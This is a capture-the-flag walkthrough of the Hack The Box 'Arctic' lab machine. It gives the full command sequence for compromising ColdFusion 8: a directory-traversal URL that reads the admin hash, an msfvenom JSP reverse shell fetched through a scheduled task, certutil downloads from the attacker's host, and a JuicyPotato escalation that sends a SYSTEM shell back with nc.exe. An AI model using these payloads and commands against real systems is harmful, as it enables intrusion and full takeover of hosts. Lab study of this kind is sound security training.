HTB WriteUps
Arctic

Last updated 2 years ago

Enumeration

As usual, we start with an nmap scan to find the open ports on the target machine.

The following nmap command scans the full port range quickly and saves the output to a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.11 -oN allPorts

  • -sS TCP SYN scan. Relatively unobtrusive, since it never completes the TCP handshake.

  • --min-rate 5000 nmap tries to keep the sending rate at or above 5000 packets per second.

  • -p- scan the entire port range, 1 to 65535.

  • -T5 insane timing template, the fastest one nmap offers (fine on a lab box, noisy and lossy against anything else).

  • -Pn skip host discovery and assume the host is online.

  • -n no reverse DNS resolution.

  • -oN save the result in normal format to a file, here allPorts.

# Nmap 7.92 scan initiated Wed Jan 12 15:27:38 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.16s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknown

# Nmap done at Wed Jan 12 15:30:02 2022 -- 1 IP address (1 host up) scanned in 144.22 seconds
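To go from the full-range scan to the targeted one without copying ports by hand, here is a small Python helper that parses nmap's normal (-oN) output and builds the follow-up command. This is an added example, not part of the original writeup; the embedded scan text is the allPorts output above, and the function names are my own.

```python
import re

# The allPorts output shown above, embedded so the helper runs offline.
ALL_PORTS_SAMPLE = """\
# Nmap 7.92 scan initiated Wed Jan 12 15:27:38 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.16s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknown

# Nmap done at Wed Jan 12 15:30:02 2022 -- 1 IP address (1 host up) scanned in 144.22 seconds
"""

# One port line of -oN output: "<port>/<proto>  <state>  <service>".
PORT_LINE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)", re.M)


def parse_open_ports(normal_output):
    """Return [(port, proto, service), ...] for every port nmap reported as open."""
    return [
        (int(port), proto, service)
        for port, proto, state, service in PORT_LINE.findall(normal_output)
        if state == "open"
    ]


def port_spec(ports):
    """Comma-separated port list in the form nmap's -p flag expects."""
    return ",".join(str(port) for port, _proto, _service in ports)


def targeted_command(target, normal_output, outfile="targeted"):
    """Build the script/version scan for just the ports found open in the first scan."""
    ports = parse_open_ports(normal_output)
    if not ports:
        raise ValueError("no open ports in scan output")
    return f"nmap -sC -sV -p{port_spec(ports)} {target} -oN {outfile}"


def unidentified(ports):
    """Ports whose service nmap could not name, or only guessed (name ends in '?').
    These are the ones to open in a browser or poke at by hand, as with 8500 here."""
    return [port for port, _proto, service in ports if service == "unknown" or service.endswith("?")]


if __name__ == "__main__":
    found = parse_open_ports(ALL_PORTS_SAMPLE)
    print(targeted_command("10.10.10.11", ALL_PORTS_SAMPLE))
    print("look at by hand:", unidentified(found))
```

The same parser works on the targeted scan's output, where a trailing ? on the service name (fmtp? for port 8500 below) is nmap's way of saying the fingerprint did not match anything it knows.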

As we see, ports 135, 8500 and 49154 are open. Let's get more information about the service and version running on each of them. The following command scans those ports in depth and saves the result to a file:

nmap -sC -sV -p135,8500,49154 10.10.10.11 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result to a file, in this case targeted.

# Nmap 7.92 scan initiated Wed Jan 12 15:31:30 2022 as: nmap -sCV -p135,8500,49154 -oN targeted 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.065s latency).

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 12 15:33:47 2022 -- 1 IP address (1 host up) scanned in 137.04 seconds

Nmap cannot identify the service on port 8500 (fmtp is only the IANA name registered for that port number, and the trailing ? marks a guess). Opening http://10.10.10.11:8500/ in a browser shows a web server with directory listing enabled.

Inside the CFIDE/ directory there is an administrator/ directory, which serves a login page.

Exploitation

The login page identifies the target as Adobe ColdFusion 8. Let's search Exploit-DB for known exploits.

Exploit-DB is a large database of exploits and proof-of-concepts used by penetration testers and vulnerability researchers.

One of the results is a directory traversal in the ColdFusion 8 administrator (CVE-2010-2861) that points at the following URL:

/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

The locale parameter ends up in a file path: the ../ sequences walk out of the web root, and the %00 (URL-encoded null byte) terminates the string once it reaches the native file API, so the trailing en never becomes part of the path that is opened on disk. Let's check it out.

And we get a password hash. ColdFusion 8 stores the administrator password in password.properties as an unsalted SHA-1 digest, so a precomputed lookup table is a quick first attempt. Let's try CrackStation.

CrackStation uses massive pre-computed lookup tables to crack password hashes. These tables store a mapping between the hash of a password and the password that produced it.

And we get a password! Let's log in to the administrator page.
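The two mechanics in this step, null-byte truncation of the locale path and the unsalted SHA-1 in password.properties, can both be checked offline. The following Python is an added example, not code from the writeup or from ColdFusion: the locale handling is a deliberately simplified model of the vulnerable behaviour (the real CFML differs in detail), ADMIN_DIR and KNOWN_LOCALES are assumptions, and the password.properties sample is constructed around a made-up password rather than taken from the box.

```python
import hashlib
import posixpath
from urllib.parse import unquote

# The payload exactly as it appears in the Exploit-DB entry used on this page.
PAYLOAD = "../../../../../../../../../../ColdFusion8/lib/password.properties%00en"

# Assumed, simplified model of the bug: a string-level check sees the whole locale
# value, while the native file open stops at the first NUL byte.
ADMIN_DIR = "/ColdFusion8/wwwroot/CFIDE/administrator/"   # assumption for the model
KNOWN_LOCALES = ("en", "ja")                               # assumption, not ColdFusion's list


def resolve_locale_path(raw_locale, admin_dir=ADMIN_DIR):
    """Return the path the file API would open for a locale value, or None if rejected."""
    decoded = unquote(raw_locale)               # "%00en" -> "\x00en"
    if not decoded.endswith(KNOWN_LOCALES):     # the string-level check passes: it ends in "en"
        return None
    truncated = decoded.split("\x00", 1)[0]     # what actually reaches the file system
    return posixpath.normpath(posixpath.join(admin_dir, truncated))


def parse_properties(text):
    """Minimal Java .properties reader: key=value lines, '#' comments, blank lines."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _sep, value = line.partition("=")
        props[key.strip()] = value.strip()
    return props


def cf8_hash(password):
    """ColdFusion 8 stores the admin password as an uppercase hex SHA-1 digest, no salt."""
    return hashlib.sha1(password.encode()).hexdigest().upper()


def verify_candidate(props, candidate):
    """Check a cracked/guessed password locally instead of trusting the lookup site blindly."""
    stored = props.get("password", "")
    if props.get("encrypted", "false").lower() == "true":
        return stored == cf8_hash(candidate)
    return stored == candidate


# Constructed sample in the layout of CF8's password.properties; the password is made up.
SAMPLE_PASSWORD = "Winter-2022"
SAMPLE_PROPERTIES = f"""\
#Wed Jan 12 15:00:00 EET 2022
rdspassword=
password={cf8_hash(SAMPLE_PASSWORD)}
encrypted=true
"""


if __name__ == "__main__":
    print("benign locale ->", resolve_locale_path("en"))
    print("payload       ->", resolve_locale_path(PAYLOAD))
    props = parse_properties(SAMPLE_PROPERTIES)
    print("hash:", props["password"])
    print("candidate ok?", verify_candidate(props, SAMPLE_PASSWORD))
```

The useful habit here is the last function: when a lookup service returns a plaintext, hash it yourself and compare before typing it into a login form, which also catches the case where the site matched a different hash format than the one the application actually uses.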

To get a shell from here, we can create a Scheduled Task that downloads a reverse shell from our machine and stores it in the CFIDE/ directory, where the web server will happily execute it when requested.

First we need the path where CFIDE/ is stored on the victim. In the left panel, which lists many administrative tools, the Mappings section shows the directory on disk that each logical path maps to.

Now we know where the /CFIDE directory is located on the victim machine. Before creating the Scheduled Task, let's create the reverse shell file.

msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.9 lport=4444 -o shell.jsp

  • -p indicates the type of payload.

  • lhost local host IP.

  • lport local port of the listener.

  • -o save the output to a file.

And we start a Python HTTP server on port 8000 in the directory holding shell.jsp (SimpleHTTPServer is the Python 2 module; with Python 3 the equivalent is python3 -m http.server):

python -m SimpleHTTPServer

Now it's time to create the Scheduled Task. Click Scheduled Tasks > Schedule New Task. Give the task a name, set the URL to the shell.jsp file served from our machine (http://10.10.14.9:8000/shell.jsp), set the output file to the absolute path C:\ColdFusion8\wwwroot\CFIDE\shell.jsp, and hit Submit.

To run the Scheduled Task right away, click the green run button next to it; we should then see a GET request arrive at the Python HTTP server.

Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.11 - - [24/Jan/2022 16:55:51] "GET /shell.jsp HTTP/1.1" 200 -

If we now check the /CFIDE directory listing, we will see the shell.jsp file.

Before requesting it, let's set a netcat listener on port 4444.

nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

If we now click on the shell.jsp link, the JSP runs inside the ColdFusion process and we get a reverse shell as the user tolis (the account ColdFusion runs under), from which we can grab the user flag.

listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.11] 49506
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis

C:\ColdFusion8\runtime\bin>type \users\tolis\desktop\user.txt
type \users\tolis\desktop\user.txt
02650d3a69a70780c302e146a6cb96f3

Privilege Escalation

Let's start by seeing what privileges the user tolis has.

whoami /priv

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

If a user has SeImpersonatePrivilege, the first thing that comes to mind is JuicyPotato.

JuicyPotato is a local privilege escalation tool for Windows that abuses DCOM: it coerces a SYSTEM-level COM server (chosen by CLSID) into authenticating to a local listener and then impersonates the resulting token. It requires SeImpersonate or SeAssignPrimaryToken, and it only works on builds before Windows 10 1809 / Server 2019; this box reports version 6.1.7600 (Windows 7 / Server 2008 R2 RTM), which is well within range.
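Before reaching for JuicyPotato it is worth reading the whole privilege list, not just SeImpersonatePrivilege. The Python below is an added example (not from the writeup or the JuicyPotato project) that parses the whoami /priv output above and reports every held privilege with a well-known escalation path; the ABUSABLE table and the function names are my own.

```python
import re

# The whoami /priv output obtained on the box, embedded so the check runs offline.
WHOAMI_PRIV_SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges with a well-known local escalation path, and the family of technique.
ABUSABLE = {
    "SeImpersonatePrivilege": "token impersonation (JuicyPotato and the other *Potato tools)",
    "SeAssignPrimaryTokenPrivilege": "token impersonation (JuicyPotato and the other *Potato tools)",
    "SeBackupPrivilege": "read any file, e.g. the SAM and SYSTEM hives",
    "SeRestorePrivilege": "write any file, e.g. replace a service binary",
    "SeDebugPrivilege": "open and inject into SYSTEM processes",
    "SeTakeOwnershipPrivilege": "take ownership of protected objects",
    "SeLoadDriverPrivilege": "load a kernel driver",
}

# One row of the table: name, free-text description, Enabled/Disabled state.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$", re.M)


def parse_privileges(text):
    """Return {privilege name: 'Enabled' | 'Disabled'} for every row in whoami /priv output."""
    return {name: state for name, _desc, state in PRIV_LINE.findall(text)}


def abusable_privileges(text):
    """Held privileges with a known abuse path, as {name: (state, note)}.
    'Disabled' only means the privilege is not currently switched on in the token;
    a process that holds it can enable it with AdjustTokenPrivileges, so it still counts."""
    held = parse_privileges(text)
    return {name: (held[name], ABUSABLE[name]) for name in ABUSABLE if name in held}


def potato_candidate(text):
    """True when either privilege the *Potato family needs is present in the token."""
    held = parse_privileges(text)
    return any(name in held for name in ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"))


if __name__ == "__main__":
    for name, (state, note) in abusable_privileges(WHOAMI_PRIV_SAMPLE).items():
        print(f"{name:32} {state:8} {note}")
    print("Potato candidate:", potato_candidate(WHOAMI_PRIV_SAMPLE))
```

Run it against output pasted from any shell you land in; it is the same check you would do by eye, just less likely to miss a privilege sitting below the one you expected.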

To escalate privileges, we transfer the JuicyPotato.exe and nc.exe binaries to the victim. Let's start a Python HTTP server in the directory that holds those binaries.

python -m SimpleHTTPServer

Then, from the tolis user's Desktop folder on the victim, download the binaries with certutil:

certutil.exe -f -urlcache -split http://10.10.14.9:8000/JuicyPotato.exe JuicyPotato.exe

certutil.exe -f -urlcache -split http://10.10.14.9:8000/nc.exe nc.exe

Before executing JuicyPotato.exe, let's set another netcat listener on port 5555 to catch a reverse shell as NT AUTHORITY\SYSTEM.

nc -lvnp 5555

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Finally, run JuicyPotato: it launches cmd.exe with the SYSTEM token, and the /c argument makes that cmd.exe send a reverse shell to our listener. Then all that is left is to take the root flag.

JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c C:\users\tolis\desktop\nc.exe -e cmd 10.10.14.9 5555"

  • -t createprocess call: t uses CreateProcessWithTokenW, u uses CreateProcessAsUser, * tries both.

  • -l local port the COM server listens on (any free port; 1337 here).

  • -p program to launch with the stolen token.

  • -a command-line arguments for that program.

No -c is given, so JuicyPotato uses its default CLSID; if that fails on a given host, pick one for the OS version from the list in the project's repository.

listening on [any] 5555 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.11] 49645
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>type C:\users\administrator\desktop\root.txt
type C:\users\administrator\desktop\root.txt
ce65ceee66b2b5ebaff07e50508ffb90

References

  • https://www.exploit-db.com/ (Adobe ColdFusion 8 directory traversal entry)
  • https://crackstation.net/
  • https://github.com/ohpe/juicy-potato